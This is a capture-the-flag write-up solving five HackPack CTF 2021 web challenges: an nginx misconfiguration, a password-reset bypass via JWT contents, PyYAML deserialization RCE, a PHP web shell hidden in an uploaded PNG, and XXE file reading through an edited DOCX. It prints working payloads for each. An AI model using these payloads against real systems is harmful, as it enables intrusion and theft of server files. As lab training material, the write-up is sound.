All web challenges from HackPack CTF 2021.
“N"ot “G"am"I"ng a"N"ymore in “X"mas
Can you login as admin?
http://no-gaming-anymore-in-xmas.ctf2021.hackpack.club
1
2
3
4
5
6
7
8
9
10
11
|
...
<span>Admin Login</span>
<div>
<input placeholder="Password"></input>
</div>
<form action="/" method="post">
<button type="submit" value="Send Email" >Login</button>
<input type="hidden" name="debug" value="0">
</form>
...
|
Make post request with debug=1, and we get some interesting feedback.
1
2
3
4
5
6
7
8
9
10
11
12
|
Let me check again my nginx conf:
server {
listen 80;
server_name localhost;
root /etc/nginx;
index index.html;
location /maybehereimportantstuff {
try_files $uri $uri/ =404;
}
}
|
Execute curl https://no-gaming-anymore-in-xmas.ctf2021.hackpack.club/maybehereimportantstuff and get the flag.
Flag: flag{ng1nx_m1sconf1g_c4n_b3_h4rmful}
All about resetting
Who can guess my password or..
http://all-about-resetting.ctf2021.hackpack.club
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
|
<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V1</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<!-- Maintaned by Nikos (npantel@ncsu.edu) -->
<body>
<span class="login100-form-title">
Member Login
</span>
<div>
<input placeholder="Email">
</input>
</div>
<div>
<input placeholder="Password">
</input>
</div>
<div class="container-login100-form-btn">
<button class="login100-form-btn">
Login
</button>
</div>
<form action="/reset" method="post">
<button type="submit" value="Send Email" >Forgot Password?</button>
</form>
</body>
</html>
|
Press Forgot Password?, type in the email npantel@ncsu.edu, submit. Get a question, What is your favorite type of governance?.
Delete session cookie, refresh, get a new cookie. Throw the new session cookie to jwt.io, get header
1
2
3
4
|
{
"favoritegovernance": "kakistocracy",
"favoriteteam": "olympiacos"
}
|
Type in kakistocracy as answer and login, get the flag.
Flag: flag{Wh4t_1s_th1s_gov3rn4nc3_!!!}
Yaml-2-Json
Checkout my useful tool to convert YAML to JSON format.
http://yaml-2-json.ctf2021.hackpack.club
Since we know flag.txt is located in /tmp/flag.txt from the hint.
There may be a Deserialize RCE vulnerability with PyYAML.
Make request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
POST / HTTP/1.1
Host: yaml-2-json.ctf2021.hackpack.club
Connection: close
Content-Length: 76
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://yaml-2-json.ctf2021.hackpack.club
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://yaml-2-json.ctf2021.hackpack.club/
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _890f5=http://192.168.181.16:10993; premium=true
yaml=!!python/object/apply:subprocess.check_output [["cat","/tmp/flag.txt"]]
|
Flag: flag{Py_PyYaml_Yaml_Py}
Indead v1
Job posting website for security experts, pentesters and hackers.
http://indead-upload-avatar.ctf2021.hackpack.club
Get a png file called test.png.
Run
1
2
|
cp test.png exp.php
echo "<?php system(\$_GET['c']); ?>" >> exp.php
|
Upload exp.php. The file will be put under very_long_directory_path.
Since we know flag.txt is located in /var/www/ from the hint.
Access https://indead-upload-avatar.ctf2021.hackpack.club/very_long_directory_path/exp.php?c=cat%20/var/www/flag.txt gives us the flag.
Flag: flag{y3t_an0ther_file_uplo@d_vuln}
Indead v2
Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV.
http://indead-upload-cv.ctf2021.hackpack.club
For this challenge, we can only upload DOCX file.
Create test.docx with test1 as content. Upload it, and get output You CV content: test1.
So there might be a XXE vulnerability.
Unzip test.docx, edit word/document.xml.
Add on line 2
1
|
<!DOCTYPE test [<!ENTITY xxe SYSTEM 'file:///var/www/flag.txt'>]>
|
Edit line 3
1
2
3
4
|
Original
...<w:t>test1</w:t>...
to
...<w:t>&xxe;</w:t>...
|
Put all the extracted files to a folder tmp.
Create the DOCX file with
1
2
|
7z a malicious.zip ./tmp/*
mv malicious.zip malicious.docx
|
Upload malicious.docx, and get the flag.
Flag: flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}